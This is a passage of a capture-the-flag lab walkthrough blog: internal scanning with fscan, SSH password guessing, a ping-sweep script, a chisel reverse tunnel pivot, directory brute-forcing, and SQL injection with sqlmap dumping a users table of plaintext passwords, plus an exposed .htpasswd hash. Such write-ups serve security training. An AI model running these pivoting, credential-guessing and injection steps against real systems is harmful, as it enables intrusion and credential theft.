src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543109.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410183740659\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>linpeas.sh<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543110.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543110.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410183902700\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543112.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543112.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410184018455\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">-rw-r--r-- 1 root root 45 Feb 16  2023 \/etc\/apache2\/.htpasswd\nbeilul:$apr1$fLBy4Y1e$5pVNuSbmc9kil7JulXfQW0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543113.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543113.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410184054193\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543114.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543114.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410184118407\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>fscan<\/h3>\n<p>Scan the internal network:<\/p>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# .\/fscan -h 172.20.10.3\/24       # wrong subnet, as discovered below...\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| &#039;__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.3\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.20.10.3     is alive\n(icmp) Target 172.20.10.8     is alive\n(icmp) Target 172.20.10.1     is alive\n[*] Icmp alive hosts len is: 3\n172.20.10.8:80 open\n172.20.10.3:80 open\n172.20.10.8:22 open\n172.20.10.3:22 open\n172.20.10.1:21 open\n172.20.10.3:21 open\n[*] alive ports len is: 6\nstart vulscan\n[+] ftp 172.20.10.3:21:anonymous \n   [-&gt;]flag.txt\n[*] WebTitle http:\/\/172.20.10.3        code:401 len:458    title:401 Unauthorized\n\u5df2\u5b8c\u6210 3\/6 [-] ssh 172.20.10.3:22 root root@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 root a123456. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 root Aa123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 admin password ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.8:22 admin admin@123#4 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 admin a12345 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 6\/6<\/code><\/pre>\n<p>Nice, let's grab that flag... wait, isn't that my own machine's IP? Hahaha.<\/p>\n<p>Since working from here is not very convenient, we need to set up a tunnel so kali can reach it; <code>chisel<\/code> seems like a good choice, which I saw in <code>L4nder<\/code>'s writeup:<\/p>\n<p>Download it locally first, then transfer it over...<\/p>\n<p>Its architecture diagram is very nice, take a look!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543115.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543115.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"overview\" \/><\/div><\/p>\n<p>Roughly, it maps the remote host's ports to the local machine:<\/p>\n<pre><code class=\"language-bash\">sudo apt install chisel    # this laid the trap for what follows<\/code><\/pre>\n<p>Then I downloaded another one from the web and uploaded it to the target:<\/p>\n<blockquote>\n<p>This set up the later mistake. Why did I go and find another one online? Because when I ran the command above, the downloaded file had <code>-kali<\/code> in its name, and I worried it might not run on the target...<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543116.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543116.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417004331385\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Then start it on the host first as the server:<\/p>\n<pre><code class=\"language-bash\">chisel server --reverse -p 2345<\/code><\/pre>\n<p>Then start it on the target as the client... wait, something is off: why is my local machine's IP address the same as what the internal scan found...<\/p>\n<p>Verify with <code>L4nder<\/code>'s script:<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n\nfunction ctrl_c(){\n    echo -e &quot;\\n\\n[!] Saliendo...\\n&quot;\n    tput cnorm; exit 1\n}\n\n# Ctrl+C\ntrap ctrl_c INT\n\n# first three octets of this host&#039;s own address, i.e. the local \/24\nnetwork=$(hostname -I | cut -d &#039;.&#039; -f 1,2,3)\n\n# ping sweep: one background ping per host, 1 s timeout each\ntput civis\nfor i in $(seq 1 254); do\n    timeout 1 bash -c &quot;ping -c 1 $network.$i&quot; &amp;&gt;\/dev\/null &amp;&amp; echo &quot;[+] HOST $network.$i - ACTIVO&quot; &amp;\ndone; wait\ntput cnorm<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# .\/nmap.sh \n[+] HOST 172.17.0.2 - ACTIVO\n[+] HOST 172.17.0.1 - ACTIVO\n[+] HOST 172.17.0.3 - ACTIVO<\/code><\/pre>\n<p>I know what went wrong: the target has no <code>ip<\/code> command, so I used the external IP to probe the internal network. I'm so stupid....<\/p>\n<p>Upload a busybox!<\/p>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# ls\nbusybox  chisel  fscan  nmap.sh\n(remote) root@788ed382e389:\/tmp# chmod +x busybox\n(remote) root@788ed382e389:\/tmp# .\/busybox ip a\n1: lo: 
&lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n4: eth0@if5: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff\n    inet 172.17.0.2\/16 brd 172.17.255.255 scope global eth0\n       valid_lft forever preferred_lft forever<\/code><\/pre>\n<p>Use fscan to probe the internal network:<\/p>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# .\/fscan -h 172.17.0.2\/24\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| &#039;__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.3\nstart infoscan\n(icmp) Target 172.17.0.1      is alive\n(icmp) Target 172.17.0.2      is alive\n(icmp) Target 172.17.0.3      is alive\n[*] Icmp alive hosts len is: 3\n172.17.0.3:80 open\n172.17.0.2:80 open\n172.17.0.1:80 open\n172.17.0.1:22 open\n172.17.0.1:21 open\n172.17.0.3:22 open\n[*] alive ports len is: 6\nstart vulscan\n[*] WebTitle http:\/\/172.17.0.2         code:401 len:457    title:401 Unauthorized\n[*] WebTitle http:\/\/172.17.0.1         code:401 len:457    title:401 Unauthorized\n[+] ftp 172.17.0.1:21:anonymous \n   [-&gt;]flag.txt\n[*] WebTitle http:\/\/172.17.0.3         code:200 len:761    title:&quot;&quot;\n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 root 1qaz@WSX ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.1:22 root Aa12345. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.1:22 admin 111111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 admin 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 admin qwe123!@# ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 6\/6<\/code><\/pre>\n<p>It looks like <code>172.20.10.3<\/code> is the target we need to attack:<\/p>\n<p>Continue building the <code>chisel<\/code> tunnel from above<\/p>\n<pre><code class=\"language-bash\">.\/chisel client 172.20.10.8:2345 R:22:172.17.0.3:22 R:80:172.17.0.3:80 <\/code><\/pre>\n<h3>Internal network pivoting<\/h3>\n<p>But an error occurred:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543117.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543117.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417012009205\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543118.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543118.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417012021789\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>It is a version mismatch between client and server; try using the same chisel binary on both sides:<\/p>\n<pre><code class=\"language-bash\"># kali\n.\/chisel server --reverse -p 2345<\/code><\/pre>\n<pre><code class=\"language-bash\"># attacked\n.\/chisel client 172.20.10.8:2345 R:22:172.17.0.3:22 R:80:172.17.0.3:80 <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543119.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543119.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417013629794\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543120.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543120.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417013637966\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Another error.... Switched to a different port, and it worked!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543121.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543121.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014224487\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543122.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543122.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014231831\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543123.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543123.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014304446\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.8:8888\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.8:8888\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              git,jpg,txt,png,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/admin                (Status: 301) [Size: 317] [--&gt; http:\/\/172.20.10.8:8888\/admin\/]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543124.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543124.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014548733\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try it first:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543125.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543125.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417015000059\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Nothing useful in the response.<\/p>\n<h3>SQL injection<\/h3>\n<p>Capture the request and run <code>sqlmap<\/code> against it:<\/p>\n<pre><code class=\"language-html\">GET \/admin\/index.php?id=1 HTTP\/1.1\nHost: 172.20.10.8:8888\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/172.20.10.8:8888\/admin\/index.php?id=1\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close<\/code><\/pre>\n<p>So the parameter is passed in the URL; try a bypass:<\/p>\n<pre><code class=\"language-apl\">?id=1&#039; and 1=1 --+\n?id=1&#039; and 1=2 --+<\/code><\/pre>\n<p>The first renders normally and the second does not, which is the classic boolean-based signal; great, and then nothing more comes of it....<\/p>\n<p>Run <code>sqlmap<\/code>:<\/p>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1 --dbs<\/code><\/pre>\n<pre><code class=\"language-apl\">available databases [3]:\n[*] creds\n[*] example\n[*] information_schema<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1 -D creds --tables<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: creds\n[1 table]\n+-------+\n| users |\n+-------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1 -D creds -T users --dump<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: creds\nTable: users\n[3 entries]\n+-------------------+----------+\n| password          | username |\n+-------------------+----------+\n| beltran48         | marco    |\n| iamoswe2023!      | txhaka   |\n| superrootpassword | root     |\n+-------------------+----------+<\/code><\/pre>\n<p>I strongly recommend reading the writeup recommended at the start: it is done entirely with scripts, indescribably elegant!<\/p>\n<p>Brute-force it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543126.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 